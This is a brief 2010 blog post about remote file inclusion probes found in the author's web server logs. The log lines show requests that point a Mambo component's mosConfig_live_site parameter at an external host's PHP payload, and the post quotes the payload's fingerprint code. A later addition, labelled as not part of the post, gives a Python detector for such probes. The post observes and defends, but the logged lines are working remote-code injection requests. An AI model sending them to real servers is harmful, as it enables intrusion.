Writing about security on your website h ... / 2010-03-04

Writing about security on your website has this interesting effect in the logs:
200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:41 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
The content of heheh.txt is predictable:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
By pure coincidence there is a file http://zerozon.co.kr/data/eeng/id1.txt with the contents:
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
And that all looks very familiar: Fx29Shell php attack. This won't keep me from writing about security or amusing myself by browsing the logfiles. Maybe I'll find a fresh attack. This automated one is getting really boring.
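A way to pull these probes out of an access log automatically, as an added example that is not part of the original post: it flags any request where a query parameter's value is itself an absolute URL, as `mosConfig_live_site` is above. The function names, the per-client summary and the benign third sample line are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format, matched up to the status code.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A query parameter whose value is itself an absolute URL is the tell.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def rfi_probes(lines):
    """Yield (host, status, param, url) for every URL-valued query parameter."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes, so an encoded http%3A%2F%2F... is caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                # Trailing '?' padding, as seen in the log, is stripped for reporting.
                yield m.group("host"), int(m.group("status")), name, value.rstrip("?")

def summarize(lines):
    """Group probes per client; mark clients whose probe did not get a 4xx/5xx."""
    report = defaultdict(lambda: {"hits": 0, "urls": set(), "review": False})
    for host, status, _param, url in rfi_probes(lines):
        entry = report[host]
        entry["hits"] += 1
        entry["urls"].add(url)
        entry["review"] |= status < 400  # request was served: check that path
    return dict(report)

SAMPLE = [
    # two of the log lines from the post
    '200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"',
    '200.93.147.154 - - [04/Mar/2010:09:58:41 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"',
    # constructed benign request from a documentation address
    '192.0.2.10 - - [04/Mar/2010:10:01:02 +0100] "GET /~koos/newstag.cgi/security?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, entry in summarize(SAMPLE).items():
        print(host, entry["hits"], sorted(entry["urls"]), "REVIEW" if entry["review"] else "rejected")
```

A client marked for review received something other than an error for its probe, which is the case worth looking at; the three hits in the log above all ended in 404.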


Koos van den Hout, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred (PGP key 5BA9 368B E6F3 34E4).